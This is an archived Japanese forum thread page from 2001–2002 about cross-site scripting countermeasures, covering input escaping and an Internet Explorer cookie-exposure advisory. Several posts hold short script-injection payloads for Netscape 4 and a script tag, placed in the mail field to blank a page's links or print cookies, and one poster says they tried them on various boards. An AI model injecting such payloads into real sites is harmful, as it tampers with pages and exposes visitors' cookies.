クロスサイトスクリプティング対策

クロスサイトスクリプティング対策 (114ﾚｽ)
上下前次 1-新

27(1): 名無しさん＠お腹いっぱい。 01/11/10 00:07 ID:9tmYIcvX(1) AAS
たぶん。としかいえんなぁ。変換関数が組み込みのものだと24に書いたみたいなテスト方法は駄目だね。
要はそれを忘れてないかどうかが問題なので。
環境変数等から変数に代入する時点で変換するというポリシーが貫けているなら、
この問題に対してはほぼ安全と思う。

28: 26 01/11/10 00:58 ID:??? AAS
>>27
とりあえずhiddenを含め全部やってるはずなので、一応安心しておきます。

29(1): cookieが表示されない [jab1@lists.em5000.com] 01/11/12 16:46 ID:??? AAS
セキュリティホール memo
外部ﾘﾝｸ:www.st.ryukoku.ac.jp の
MS01-055: Cookie Data in IE Can Be Exposed or Altered Through Script Injection (セキュリティアンテナ, 2001.11.09)にあるデモ

外部ﾘﾝｸ:www.solutions.fi
でamazon.co.jpを読むと（事前にamazon.co.jpのcookieを取り込んである）
MSIE cookie vulnerability test page
This page displays the cookies found on your browser for site amazon.co.jp:
Cookies:
No cookies found for site...
Click here to make new search for cookies.
省10

30: 名無しさん＠お腹いっぱい。 01/11/12 17:13 ID:??? AAS
>>29
IE5.5とIE6しか再現しないそうだ

31: ＞３０ [jab1@lists.em5000.com] 01/11/12 18:24 ID:??? AAS
ＩＥは５．０１ＳＰ２です。
外部ﾘﾝｸ[asp]:www.microsoft.com
によると、
テストしたバージョン :
マイクロソフトは Internet Explorer 5.5 SP2 および 6 のテストを行い、これらの脆弱性による影響を評価しました。それ以前のバージョンに関してはサポート (英語情報) の対象となっていないため、この脆弱性による影響は不明です。
とのこと。
ということは、５．０１でも危険ということだろうか。

32: 名無しさん＠お腹いっぱい。 [age] 01/11/26 07:56 ID:??? AAS
age

33: 名無しさん＠お腹いっぱい。 01/12/17 07:29 ID:BojNQSph(1) AAS
age

34: テスト 01/12/19 07:01 ID:RLJpoDQa(1) AAS
外部ﾘﾝｸ:pc.2ch.net

35: テスト 01/12/19 07:06 ID:??? AAS
外部ﾘﾝｸ:pc.2ch.net

36: 名無しさん＠お腹いっぱい。 [age] 02/01/12 14:08 ID:??? AAS
age

37: 　 02/01/26 08:50 ID:SUrQysHb(1) AAS
a

38(1): 名無しさん＠お腹いっぱい。 02/01/26 11:51 ID:??? AAS
こんなのmail欄に入れたらどうなるんだろう？
&{document.captureEvents(Event.LOAD);window.onload=new Function('for(var i=0;Boolean(document.links[i]);i++)document.links[i].href=\'\';')};

39: 名無しさん＠お腹いっぱい。 02/01/26 13:20 ID:??? AAS
>38
自分でやってみてよ(笑)

40(2): 名無しさん＠お腹いっぱい。 02/01/26 13:47 ID:??? AAS
メール欄が長すぎます・・・だって（笑）

&{for(var i=0;document.links[i];i++)document.links[i].href='';};
これは大丈夫やった。

41(1): 名無しさん＠お腹いっぱい。 02/01/26 14:05 ID:??? AAS
>40
どこでやってきたの？(笑)

42(1): 名無しさん＠お腹いっぱい。 02/01/26 17:32 ID:??? AAS
>>41
色んなところ。反応が一つもないところを見ると
NN4でスクリプトONにしてる奴、あんまおらんのかな？

43: 名無しさん＠お腹いっぱい。 [&{document.write(document.cookie)};] 02/01/26 22:09 ID:??? AAS
age

44: 名無しさん＠お腹いっぱい。 [<script>document.write(l(null));</script>] 02/01/26 22:19 ID:??? AAS
age

45(1): ネスケ4.7使用者 02/01/27 10:13 ID:??? AAS
>>42
ひいい・・・・2ちゃんで窓が出たよう・・・。

46: 名無しさん＠お腹いっぱい。 02/01/27 10:17 ID:??? AAS
>45
(笑)

上下前次 1-新書関写板覧索設栞歴

あと 68 ﾚｽあります
ｽﾚ情報赤ﾚｽ抽出画像ﾚｽ抽出歴の未読ｽﾚ AAｻﾑﾈｲﾙ

ぬこの手ぬこTOP 0.027s